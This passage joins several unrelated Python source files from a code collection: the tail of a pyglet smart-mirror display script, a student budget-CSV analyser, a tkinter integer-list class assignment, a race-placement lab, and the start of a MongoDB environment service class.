current_glasses = appearance['glasses']\n current_gender = appearance['gender']\n current_age = appearance['age_group']\n \n return\n\n###############################################################################\n###############################################################################\ndef get_image_schedule(dt):\n d = threading.Thread(target = get_image, name = 'get_image')\n d.setDaemon(True)\n d.start()\n return\n\ndef set_color():\n global opacity\n\n \"\"\"\n opacity += 30 if currentEmoji != resources.no_people else - 5\n if opacity < 0:\n opacity = 0\n elif opacity > 255:\n opacity = 255\n \"\"\"\n if opacity == 0:\n opacity = 255\n else:\n opacity = 0\n \n if show_distances:\n set_text_distance(icon_driving, text_driving, texto_driving, show_driving)\n set_text_distance(icon_walking, text_walking, texto_walking, show_walking)\n set_text_distance(icon_bicycling, text_bicycling, texto_bicycling, show_bicycling)\n \n for text in texts:\n text.color = (255, 255, 255, opacity)\n text.font_name = font_name\n \n for icon in icons:\n icon.opacity = opacity\n \n set_text_block(textBlock.text)\n \n widget.opacity = 255 - opacity\n \n #if opacity == 0 or opacity == 255:\n # pyglet.clock.unschedule(set_color)\n \n return\n\ndef set_datetime_schedule(dt): \n set_datetime()\n return\n\ndef set_weather_schedule(dt):\n d = threading.Thread(target = set_weather,\n name = 'set_weather')\n d.setDaemon(True)\n d.start()\n return\n\ndef set_text_distances_schedule(dt):\n set_text_distance_t()\n return\n\ndef add_text_log(*text):\n global texto_log\n texto_log.append(' '.join(str(t) for t in text))\n\ndef add_text_log_ocr(*text):\n global texto_log_ocr\n texto_log_ocr.append(' '.join(str(t) for t in text))\n \ndef set_text_log():\n global texto_log\n \n if len(texto_log) > 6:\n del texto_log[0]\n \n text_log.text = '
'.join(texto_log)\n text_log.color = (255, 255, 255, opacity)\n text_log.font_size = 14*scale\n text_log.font_name = font_name\n \ndef set_text_log_ocr():\n global texto_log_ocr\n \n if len(texto_log_ocr) > 6:\n del texto_log_ocr[0]\n \n text_log_ocr.text = '
'.join(texto_log_ocr)\n text_log_ocr.color = (255, 255, 255, opacity)\n text_log_ocr.font_size = 14*scale\n text_log_ocr.font_name = font_name\n\ndef update(dt):\n global currentEmoji\n global has_people\n global change_ocr\n global show_distances\n global icons, texts\n global textWeather, iconWeather, show_weather\n global no_people_timestamp\n global qr_up\n global qr_timestamp\n \n \n if has_people:\n for obj in emojis:\n obj.update(dt,currentEmoji)\n \n if show_logs:\n set_text_log()\n set_text_log_ocr()\n \n if show_distances:\n set_text_distance(icon_driving, text_driving, texto_driving, show_driving)\n set_text_distance(icon_walking, text_walking, texto_walking, show_walking)\n set_text_distance(icon_bicycling, text_bicycling, texto_bicycling, show_bicycling)\n show_distances = False\n \n if show_weather:\n if textWeather.text == '°C':\n texts.append(textWeather)\n icons.append(iconWeather)\n icons.append(widgetWeather)\n \n textWeather.text = weather_text\n textWeather.color = (255, 255, 255, opacity)\n textWeather.font_size = 24*scale\n textWeather.font_name = font_name\n \n iconWeather.image = get_weather_image()\n iconWeather.opacity = opacity\n \n widgetWeather.opacity = opacity\n \n show_weather = False\n \n if change_ocr:\n draw_text_blocks()\n change_ocr = False\n \n if show_gender:\n if 'Female' in current_gender:\n if current_glasses:\n widget_gender.image = resources.female_glasses\n else:\n widget_gender.image = resources.female\n else:\n if current_glasses:\n widget_gender.image = resources.male_glasses\n else:\n widget_gender.image = resources.male\n widget_gender.opacity = opacity\n else:\n widget_gender.image = resources.none\n widget_gender.opacity = opacity\n \n if show_age:\n if 'Child' in current_age:\n widget_age.image = resources.age_1\n elif 'Young' in current_age:\n widget_age.image = resources.age_2\n elif 'Adult' in current_age:\n widget_age.image = resources.age_3\n elif 'Senior' in current_age:\n widget_age.image = resources.age_4\n else:\n widget_age.image = resources.age_none\n widget_age.opacity = opacity\n else:\n widget_age.image = resources.none\n widget_age.opacity = opacity\n \n if emojis[0].opacity == 0:\n if has_people and abs(time.time() - no_people_timestamp) > 5:\n print('##### HIDE #####')\n \n set_color()\n #pyglet.clock.schedule_interval(set_color, 1/30.0)\n has_people = False\n else:\n no_people_timestamp = time.time()\n \n # mover QR cada 1 minuto\n if abs(time.time() - qr_timestamp) > 60:\n qr_timestamp = time.time()\n widget_qr.y += dt * (qr_velocity if qr_up else -qr_velocity)\n if widget_qr.y > qr_min_y:\n qr_up = False\n elif widget_qr.y < qr_max_y:\n qr_up = True\n \n else:\n global marca_up\n widget.y += dt * (marca_velocity if marca_up else -marca_velocity)\n if widget.y > marca_min_y:\n marca_up = False\n elif widget.y < marca_max_y:\n marca_up = True\n \n \n if not has_people and people_timestamp > 0 and abs(time.time() - people_timestamp) < 1:\n print('##### SHOW #####')\n set_color()\n #pyglet.clock.schedule_interval(set_color, 1/30.0)\n has_people = True\n draw_text_blocks()\n return\n\n\n###############################################################################\n###############################################################################\n###############################################################################\n###############################################################################\nif show_camera:\n cv2.namedWindow('camara',\n flags = cv2.WINDOW_NORMAL)\ndraw_text_blocks()\nif dev_recomendations:\n pyglet.clock.schedule_interval(draw_text_blocks_s, 60)\nset_datetime()\npyglet.clock.schedule_interval(set_datetime_schedule, 1)\nset_weather()\npyglet.clock.schedule_interval(set_weather_schedule, 1800)\nset_text_distance_t()\npyglet.clock.schedule_interval(set_text_distances_schedule, 300)\n\npyglet.clock.schedule_interval(update, 1/60.0)\npyglet.clock.schedule_once(get_image_schedule, 0.5)\n\npyglet.app.run()\n","sub_path":"v1/Mirror.py","file_name":"Mirror.py","file_ext":"py","file_size_in_byte":29402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"616601402","text":"import os, csv\nfrom pathlib import Path\n# Assign file location with the pathlib library\ncsv_file_path = os.path.join(\"Resources\",\"budget_data.csv\")\n#Initialize variables\nmcount = 0\ntotal = 0\nreValue = 0\nDiff = 0\nDiffMax = 0\nDiffMin = 0\n#Open and read CSV file\nwith open(csv_file_path, newline='') as budget:\n csvreader = csv.reader(budget, delimiter=',')\n csv_header = next(csvreader)\n print(f'Financial Analysis'+'\\n')\n print(f'----------------------------'+'\\n')\n for i in csvreader:\n month = i[0]\n Amount = i[1]\n iAmount = int(Amount)\n Diff = iAmount - reValue\n #Placeholder to track greatest increase in profits (financial analysis)\n if DiffMax < Diff:\n DiffMax = Diff\n DiffMaxDate = month\n #Placeholder to track greatest decrease in profits (financial analysis)\n if DiffMin > Diff:\n DiffMin = Diff\n DiffMinDate = month\n PreValue = iAmount\n # Get total months (financial analysis)\n mcount = mcount + 1\n total += int(Amount)\n## Display Results ##\n#The total number of months included in the dataset\nprint(f'Total Months : {mcount}')\n#The total net amount of \"Profit/Losses\" over the entire period\nprint(f'Total: $ {total}')\n# Greatest increase in profit\nprint(f'Greatest Increase in Profits: {DiffMaxDate} : ($ {DiffMax})')\nprint(f'Greatest Decrease in Profits: {DiffMinDate} : ($ {DiffMin})')\n\n\n\n\n\n\n\n","sub_path":"PyBank/budget_data.py","file_name":"budget_data.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"319943220","text":"# Date: January 8, 2018\r\n# Author: Brandon Lo\r\n# Purpose: To perform different functions on an integer list/class\r\n# Inputs: N/A\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\n# IMPORTS\r\nimport random\r\nfrom tkinter import *\r\n\r\n# Date: January 8, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Create a class to handle and organize multiple integers\r\n# Inputs: N/A\r\n# Output: Screen / Monitor\r\n# =====\r\n# Data Elements:\r\n# Size - determines the size of the integer\r\n# intList - a list which contains multiple integers\r\n# =====\r\n# Methods:\r\n# __str__ - returns the list according to the size\r\n# initAsNum - recreates the list with a given parameter value, given the size\r\n# initAsSeq - recreates the list with the values given the size\r\n# calcTotal - returns the total value of the elements in list\r\n# calcMean - returns the average of the elements in list\r\n# findLargest - returns the largest element in list\r\n# calcFreq - returns a count of the number of elements matching a given parameter value in list\r\n# insertAt - inserts a given value into the IntGroup at a given position\r\n# removeAt - removes the element at a given parameter position in list\r\n# removeAll - removes all the elements in the list matching a given parameter value\r\n# findFirst - returns the position of a given parameter value element in the list\r\n# isSorted - returns true if the list is in ascending order\r\n# merge - combines the list with another list one by one\r\n\r\nclass IntGroup():\r\n\r\n # Date: January 8, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Initialize the data elements and create an integer list\r\n # Inputs: Parameter\r\n # Output: N/A\r\n # =====================================================================\r\n def __init__(self, size = 0):\r\n if size >= 0 and size <= 20:\r\n self.size = size\r\n else:\r\n self.size = 0\r\n self.intList = []\r\n for count in range(self.size):\r\n self.intList.append(random.randint(0, self.size))\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Converts the list into a string\r\n # Inputs: Data elements\r\n # Output: Return\r\n # =====================================================================\r\n def __str__(self):\r\n return str(self.intList) + \" size: \" + str(self.size)\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Initializes the list as a number\r\n # Inputs: Data elements / Parameters\r\n # Output: Changing data elements\r\n # =====================================================================\r\n def initAsNum(self, value, size):\r\n self.intList = []\r\n if size >= 0:\r\n self.size = size\r\n for count in range(size):\r\n self.intList.append(value)\r\n else:\r\n self.size = 0\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Initializes the list as a sequence of numbers\r\n # Inputs: Data elements / Parameter\r\n # Output: Changing data elements\r\n # =====================================================================\r\n def initAsSeq(self, size):\r\n self.intList = []\r\n if size >= 0:\r\n self.size = size\r\n for count in range(1, size + 1):\r\n self.intList.append(count)\r\n else:\r\n self.size = 0\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Calculates the sum of all individual values in the list\r\n # Inputs: Data elements\r\n # Output: Return\r\n # =====================================================================\r\n def calcTotal(self):\r\n listSum = 0\r\n for num in self.intList:\r\n listSum += num\r\n return listSum\r\n\r\n # Date: January 11, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Calculates the mean of all invidual values in the list\r\n # Inputs: Data elements\r\n # Output: Return\r\n # =====================================================================\r\n def calcMean(self):\r\n size = len(self.intList)\r\n if not size == 0:\r\n listSum = float(0)\r\n for num in self.intList:\r\n listSum += num\r\n mean = listSum / size\r\n else:\r\n mean = 0\r\n return mean\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Finds the largest numebr in the integer list\r\n # Inputs: Data elements\r\n # Output: Return\r\n # =====================================================================\r\n def findLargest(self):\r\n maxInt = 0\r\n if self.size > 0:\r\n maxInt = max(self.intList)\r\n return maxInt\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Calculates the frequency of an integer in the list\r\n # Inputs: Data elements\r\n # Output: Return\r\n # =====================================================================\r\n def calcFreq(self, value):\r\n count = 0\r\n if value in self.intList:\r\n count = self.intList.count(value)\r\n return count\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Inserts a value inside a list at a given position\r\n # Inputs: Data elements / Parameters\r\n # Output: Changing data elements\r\n # =====================================================================\r\n def insertAt(self, pos, value):\r\n if pos < 0:\r\n pos = 0\r\n elif pos >= len(self.intList):\r\n pos = len(self.intList)\r\n self.intList.insert(pos, value)\r\n self.size += 1\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Removes a value inside a list at a given position\r\n # Inputs: Data elements / Parameter\r\n # Output: Changing data elements\r\n # =====================================================================\r\n def removeAt(self, pos):\r\n if pos >= 0 and pos < len(self.intList):\r\n del self.intList[pos]\r\n self.size -= 1\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Removes all of a given value inside of the list\r\n # Inputs: Data elements / Parameter\r\n # Output: Changing data elements\r\n # =====================================================================\r\n def removeAll(self, value):\r\n while value in self.intList:\r\n self.intList.remove(value)\r\n self.size -= 1\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: To determine the first position of a given value in a list\r\n # Inputs: Data elements / Parameter\r\n # Output: Return\r\n # =====================================================================\r\n def findFirst(self, value):\r\n pos = -1\r\n if value in self.intList:\r\n pos = self.intList.index(value)\r\n return pos\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: To check if the list is sorted\r\n # Inputs: Data elements\r\n # Output: Return\r\n # =====================================================================\r\n def isSorted(self):\r\n valid = True\r\n for count in range(len(self.intList) - 1):\r\n if not self.intList[count] <= self.intList[count + 1]:\r\n valid = False\r\n return valid\r\n\r\n # Date: January 9, 2018\r\n # Author: Brandon Lo\r\n # Purpose: Merge two different lists to create a merged list\r\n # Inputs: Data elements / Parameter\r\n # Output: Return\r\n # =====================================================================\r\n def merge(self, secondGroup):\r\n newClass = IntGroup()\r\n newList = newClass.intList\r\n listA = self.intList[:]\r\n listB = secondGroup.intList[:]\r\n\r\n newClass.size = len(listA) + len(listB)\r\n\r\n while len(listA) > 0 and len(listB) > 0:\r\n if min(listA) <= min(listB):\r\n newList.append(min(listA))\r\n listA.remove(min(listA))\r\n else:\r\n newList.append(min(listB))\r\n listB.remove(min(listB))\r\n\r\n while len(listA) > 0:\r\n newList.append(min(listA))\r\n listA.remove(min(listA))\r\n\r\n while len(listB) > 0:\r\n newList.append(min(listB))\r\n listB.remove(min(listB))\r\n \r\n return newClass\r\n\r\n# Global variable initialization for tkinter widgets\r\nglobal group\r\ngroup = IntGroup()\r\n\r\n# Date: January 11, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Initialize the list as a sequence\r\n# Inputs: Global variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userInitSeq():\r\n if strSize.get().isdigit():\r\n group.initAsSeq(int(strSize.get()))\r\n strList.set(value = group.__str__())\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please enter a valid size.\")\r\n\r\n# Date: January 11, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Initialize the list as an integer\r\n# Inputs: Global variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userInitNum():\r\n if strEntryNum.get().isdigit() and strSize.get().isdigit():\r\n group.initAsNum(int(strEntryNum.get()), int(strSize.get()))\r\n strList.set(value = group.__str__())\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please enter a valid integer and size.\")\r\n\r\n# Date: January 11, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Only enables needed entry boxes when selected\r\n# Inputs: N/A\r\n# Output: Configure GUI\r\n# =====================================================================\r\n\r\ndef userClickAdd():\r\n entryVal.config(state = \"normal\")\r\n entryPos.config(state = \"normal\")\r\n\r\n# Date: January 11, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Only enables needed entry boxes when selected\r\n# Inputs: N/A\r\n# Output: Configure GUI\r\n# =====================================================================\r\n\r\ndef userClickRmv():\r\n entryVal.config(state = \"disabled\")\r\n entryPos.config(state = \"normal\")\r\n\r\n# Date: January 11, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Only enables needed entry boxes when selected\r\n# Inputs: N/A\r\n# Output: Configure GUI\r\n# =====================================================================\r\n\r\ndef userClickRmvAll():\r\n entryVal.config(state = \"normal\")\r\n entryPos.config(state = \"disabled\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Only enables needed entry boxes when selected\r\n# Inputs: N/A\r\n# Output: Configure GUI\r\n# =====================================================================\r\n\r\ndef userClickFreq():\r\n entryVal.config(state = \"normal\")\r\n entryPos.config(state = \"disabled\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Only enables needed entry boxes when selected\r\n# Inputs: N/A\r\n# Output: Configure GUI\r\n# =====================================================================\r\n\r\ndef userClickFind():\r\n entryVal.config(state = \"normal\")\r\n entryPos.config(state = \"disabled\")\r\n\r\n# Date: January 11, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Operates a function depending on the active radio button\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickConfirm():\r\n if config.get() == 1:\r\n if strValue.get().isdigit() and strPosition.get().isdigit():\r\n val = int(strValue.get())\r\n pos = int(strPosition.get())\r\n group.insertAt(pos, val)\r\n strList.set(value = group.__str__())\r\n strOptionTitle.set(value = \"Added integer \" + str(val) + \" to the list at position \" + str(pos))\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please enter a valid integer value, and position.\")\r\n \r\n elif config.get() == 2:\r\n if strPosition.get().isdigit():\r\n pos = int(strPosition.get())\r\n group.removeAt(pos)\r\n strList.set(value = group.__str__())\r\n strOptionTitle.set(value = \"Removed a value from position \" + str(pos) + \" from the list.\")\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please enter a valid position.\")\r\n\r\n elif config.get() == 3:\r\n if strValue.get().isdigit():\r\n val = int(strValue.get())\r\n group.removeAll(val)\r\n strList.set(value = group.__str__())\r\n strOptionTitle.set(value = \"Removed all of integer \" + str(val) + \" from the list.\")\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please enter a valid integer value.\")\r\n\r\n elif config.get() == 4:\r\n if strValue.get().isdigit():\r\n val = int(strValue.get())\r\n freq = group.calcFreq(val)\r\n strOptionTitle.set(value = \"The number \" + str(val) + \" appears \" + str(freq) + \" times in the list.\")\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please enter a valid integer value.\")\r\n\r\n elif config.get() == 5:\r\n if strValue.get().isdigit():\r\n val = int(strValue.get())\r\n pos = group.findFirst(val)\r\n if not pos < 0:\r\n strOptionTitle.set(value = \"The number \" + str(val) + \" appears at position \" + str(pos))\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please find a valid integer value found within the list.\")\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please enter a valid integer value.\")\r\n\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"Please choose an option first.\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Sorts the list\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickSort():\r\n if not group.intList == []:\r\n group.intList.sort()\r\n strList.set(value = group.__str__())\r\n strOptionTitle.set(value = \"The list has been sorted.\")\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"There is currently no list to sort\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Checks to see if the list is sorted\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickCheckSort():\r\n if not group.intList == []:\r\n sort = group.isSorted()\r\n if sort == True:\r\n strOptionTitle.set(value = \"The list is sorted.\")\r\n else:\r\n strOptionTitle.set(value = \"The list is NOT sorted.\")\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"There is currently no list to check.\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Calculates the total of all the integers in the list\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickCalcTotal():\r\n if not group.intList == []:\r\n total = group.calcTotal()\r\n strOptionTitle.set(value = \"The total value of all integers in the list are \" + str(total))\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"There is currently nothing in the list...\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Calculates the average of all the integers in the list\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickCalcMean():\r\n if not group.intList == []:\r\n mean = group.calcMean()\r\n strOptionTitle.set(value = \"The average of all integers in the list are \" + str(mean))\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"There is currently nothing in the list...\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Finds the largest integer in the list\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickFindLargest():\r\n if not group.intList == []:\r\n largest = group.findLargest()\r\n strOptionTitle.set(value = \"The largest integer in the list is \" + str(largest))\r\n else:\r\n messagebox.showerror(\"ERROR!\", \"There is currently nothing in the list...\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Resets the list\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickReset():\r\n group.intList = []\r\n group.size = 0\r\n strOptionTitle.set(value = \"The list has been resetted.\")\r\n strList.set(value = group.__str__())\r\n strOptionTitle.set(value = \"CONFIGURE LIST:\")\r\n strMergeTitle.set(value = \"MERGE:\")\r\n\r\n# Date: January 12, 2018\r\n# Author: Brandon Lo\r\n# Purpose: Merges the list with the same one\r\n# Inputs: Global Variable\r\n# Output: Screen / Monitor\r\n# =====================================================================\r\n\r\ndef userClickMergeList():\r\n randomGroup = IntGroup(10)\r\n newGroup = group.merge(randomGroup)\r\n strOptionTitle.set(value = \"Merged the list with another random list.\")\r\n strMergeTitle.set(value = randomGroup.__str__())\r\n strList.set(value = newGroup.__str__())\r\n group.intList = newGroup.intList\r\n\r\n# MAIN (Console)\r\ng = IntGroup(15)\r\nprint(\"Initialized List:\")\r\nprint(g)\r\nprint()\r\n# =========================================================\r\ng.initAsNum(5, 20)\r\nprint(\"Initialize as Number 5, with a size of 20:\")\r\nprint(g)\r\nprint()\r\n# =========================================================\r\ng.initAsSeq(10)\r\nprint(\"Initialize as Sequence, with a size of 10:\")\r\nprint(g)\r\nprint(\"Total:\", g.calcTotal())\r\nprint(\"Mean:\", g.calcMean())\r\nprint(\"Largest:\",g.findLargest())\r\nprint(\"Number of 5's found:\", g.calcFreq(5))\r\nprint()\r\n# =========================================================\r\ng.insertAt(5, 50)\r\ng.insertAt(4, 50)\r\ng.insertAt(3, 50)\r\ng.insertAt(2, 49)\r\ng.insertAt(1, 48)\r\nprint(\"Inserted 3 new integers as 50, one 49, and one 48:\")\r\nprint(g)\r\nprint(\"Number of 50's found:\", g.calcFreq(50))\r\nprint()\r\n# =========================================================\r\ng.removeAll(50)\r\nprint(\"Removed all integer values of 50:\")\r\nprint(g)\r\nprint()\r\n# =========================================================\r\ng.removeAt(8)\r\ng.removeAt(5)\r\nprint(\"Removed position 8 and position 5 from the list (7 and 4):\")\r\nprint(g)\r\nprint(\"Finding value number 49:\", g.findFirst(49))\r\nprint(\"Sorted:\", g.isSorted())\r\ng.intList.sort()\r\nprint()\r\n# =========================================================\r\nprint(\"After Sorting:\")\r\nprint(g)\r\nprint(\"Sorted:\", g.isSorted())\r\nprint()\r\n# =========================================================\r\ng2 = IntGroup(10)\r\nmergedGroup = g.merge(g2)\r\nprint(\"Group A:\")\r\nprint(g)\r\nprint()\r\nprint(\"Group B\")\r\nprint(g2)\r\nprint()\r\nprint(\"Merged Groups:\")\r\nprint(mergedGroup)\r\n\r\n# GUI\r\nmyWindow = Tk()\r\nmyWindow.config(width = 825, height = 275, bg = \"white\")\r\nmyWindow.title(\"INTEGER LIST!\")\r\n\r\nstrList = StringVar()\r\nstrList.set(value = group.__str__())\r\n\r\nstrSize = StringVar()\r\nstrConfigList = StringVar()\r\nstrEntryNum = StringVar()\r\nstrValue = StringVar()\r\nstrPosition = StringVar()\r\nstrFind = StringVar()\r\n\r\nstrOptionTitle = StringVar()\r\nstrOptionTitle.set(value = \"CONFIGURE LIST:\")\r\n\r\nstrMergeTitle = StringVar()\r\nstrMergeTitle.set(value = \"MERGE:\")\r\n\r\nconfig = IntVar()\r\n\r\n# List Title\r\nLabel(myWindow, wraplength = 780, textvariable = strList, width = 99, height = 2, font = (\"Helvetica\", 10, \"bold\")).place(x = 15, y = 12.5)\r\n\r\nButton(myWindow, text = \"RESET\", command = lambda: userClickReset(), bg = \"white\", relief = \"solid\", width = 8).place(x = 15, y = 55)\r\n\r\n# Initialize List\r\nLabel(myWindow, text = \"INITIALIZE:\", width = 15, height = 1, bg = \"white\", font = (\"Helvetica\", 12, \"bold\")).place(x = 40, y = 95)\r\nButton(myWindow, text = \"Initialize as Sequence\", command = lambda: userInitSeq(), bg = \"white\", relief = \"solid\", width = 20).place(x = 37.5, y = 130)\r\nButton(myWindow, text = \"Initialize as Number\", command = lambda: userInitNum(), bg = \"white\", relief = \"solid\", width = 15).place(x = 37.5, y = 160)\r\nEntry(myWindow, textvariable = strEntryNum, relief = \"solid\", width = 4).place(x = 160, y = 165)\r\n\r\n# Config List\r\nLabel(myWindow, textvariable = strOptionTitle, width = 56, height = 1, bg = \"white\", font = (\"Helvetica\", 12, \"bold\")).place(x = 225, y = 65)\r\nLabel(myWindow, text = \"VALUE:\", width = 8, height = 1, bg = \"white\").place(x = 245, y = 100)\r\nentryVal = Entry(myWindow, textvariable = strValue, relief = \"solid\", width = 15)\r\nentryVal.place(x = 325, y = 100)\r\nLabel(myWindow, text = \"POSITION:\", width = 8, height = 1, bg = \"white\").place(x = 570, y = 100)\r\nentryPos = Entry(myWindow, textvariable = strPosition, relief = \"solid\", width = 15)\r\nentryPos.place(x = 655, y = 100)\r\nRadiobutton(myWindow, text = \"Add\", command = lambda: userClickAdd(), variable = config, value = 1, bg = \"white\", relief = \"solid\", width = 8).place(x = 225, y = 130)\r\nRadiobutton(myWindow, text = \"Remove\", command = lambda: userClickRmv(), variable = config, value = 2, bg = \"white\", relief = \"solid\", width = 10).place(x = 305, y = 130)\r\nRadiobutton(myWindow, text = \"Remove All\", command = lambda: userClickRmvAll(), variable = config, value = 3, bg = \"white\", relief = \"solid\", width = 12).place(x = 400, y = 130)\r\nRadiobutton(myWindow, text = \"Check Freq\", command = lambda: userClickFreq(), variable = config, value = 4, bg = \"white\", relief = \"solid\", width = 16).place(x = 510, y = 130)\r\nRadiobutton(myWindow, text = \"Find in List\", command = lambda: userClickFind(), variable = config, value = 5, bg = \"white\", relief = \"solid\", width = 18).place(x = 640, y = 130)\r\nButton(myWindow, text = \"Confirm\", command = lambda: userClickConfirm(), bg = \"white\", relief = \"solid\", width = 26).place(x = 225, y = 160)\r\nButton(myWindow, text = \"Sort List\", command = lambda: userClickSort(), bg = \"white\", relief = \"solid\", width = 10).place(x = 415, y = 160)\r\nButton(myWindow, text = \"Check Sort\", command = lambda: userClickCheckSort(), bg = \"white\", relief = \"solid\", width = 10).place(x = 490, y = 160)\r\nButton(myWindow, text = \"Calc Total\", command = lambda: userClickCalcTotal(), bg = \"white\", relief = \"solid\", width = 10).place(x = 565, y = 160)\r\nButton(myWindow, text = \"Calc Mean\", command = lambda: userClickCalcMean(), bg = \"white\", relief = \"solid\", width = 10).place(x = 640, y = 160)\r\nButton(myWindow, text = \"Find Largest\", command = lambda: userClickFindLargest(), bg = \"white\", relief = \"solid\", width = 10).place(x = 715, y = 160)\r\n\r\n# Sizing\r\nLabel(myWindow, text = \"SIZE OF LIST:\", bg = \"white\", font = (\"Helvetica\", 12, \"bold\")).place(x = 55, y = 195)\r\nEntry(myWindow, textvariable = strSize, relief = \"solid\", width = 20).place(x = 50, y = 230)\r\n\r\n# Merge\r\nLabel(myWindow, textvariable = strMergeTitle, width = 56, height = 1, bg = \"white\", font = (\"Helvetica\", 12, \"bold\")).place(x = 225, y = 200)\r\nButton(myWindow, text = \"Merge the list with another random list [size: 10]\", command = lambda: userClickMergeList(), bg = \"white\", relief = \"solid\", width = 80).place(x = 225, y = 230)\r\n\r\nmainloop()\r\n\r\n\r\n","sub_path":"Python/Lists/Integer Lists.py","file_name":"Integer Lists.py","file_ext":"py","file_size_in_byte":23126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"167351199","text":"# Name:  Luke Harrison \t\t\tDate Assigned: Oct 1, 2015    \n# Name: Mitchell Gressett\n# \n# Course:  CSE 1284 Sec 13 \t\tDate Due:  Oct 1, 2015  \n#\n# File name:  llh281_mdg249_lab5.py\n#\n# Program Description:  Calculate 1st, 2nd, and 3rd of a race\n\nracers = int(input('How many cars were in the race? '))\n\nfirst = 1000\nsecond = 1000\nthird = 1000\nfirst_position = 0\nsecond_position = 0\nthird_position = 0\n\n\nfor each in range(0, racers):\n\ttime = int(input('Time of racer: '))\n\t\n\tif time < third:\n\t\tthird_position = each\n\t\tthird = time\n\t\tif time < second:\n\t\t\tthird = second\n\t\t\tsecond_position = each\n\t\t\tsecond = time\n\t\t\tif time < first:\n\t\t\t\tsecond = first\n\t\t\t\tfirst_position = each\n\t\t\t\tfirst = time\n\n\nprint('First place is #', first_position, 'at ', first)\nprint('Second place is #', second_position, 'at ', second)\nprint('Third place is #', third_position, 'at ', third)","sub_path":"labs/lab_5.py","file_name":"lab_5.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"128695269","text":"\nimport re\nimport json\nimport datetime\n\nfrom clover.common.utils.mongo import Mongo\nfrom clover.common.utils import get_friendly_id\n\n\nclass Service():\n\n def __init__(self):\n self.db = Mongo()\n\n def create(self, data):\n \"\"\"\n :param data:\n :return:\n \"\"\"\n data.setdefault('_id', get_friendly_id())\n data.setdefault('created', datetime.datetime.now())\n collection = data.pop(\"type\", None)\n return self.db.insert(\"environment\", collection, data)\n\n def detele(self, data):\n \"\"\"\n :param data:\n :return:\n \"\"\"\n count = 0\n collection = data.get(\"type\", None)\n for id in data['id_list']:\n result = self.db.delete(\"environment\", collection, {'_id': id})\n count += result\n return count\n\n def update(self, data):\n \"\"\"\n :param data:\n :return:\n \"\"\"\n filter = {'_id': data.pop('_id')}\n collection = data.pop(\"type\", None)\n return self.db.update(\"environment\", collection, filter, data)\n\n def search(self, data):\n \"\"\"\n :param data:\n :return:\n \"\"\"\n collection = data.pop(\"type\", None)\n total, result = self.db.search(\"environment\", collection, 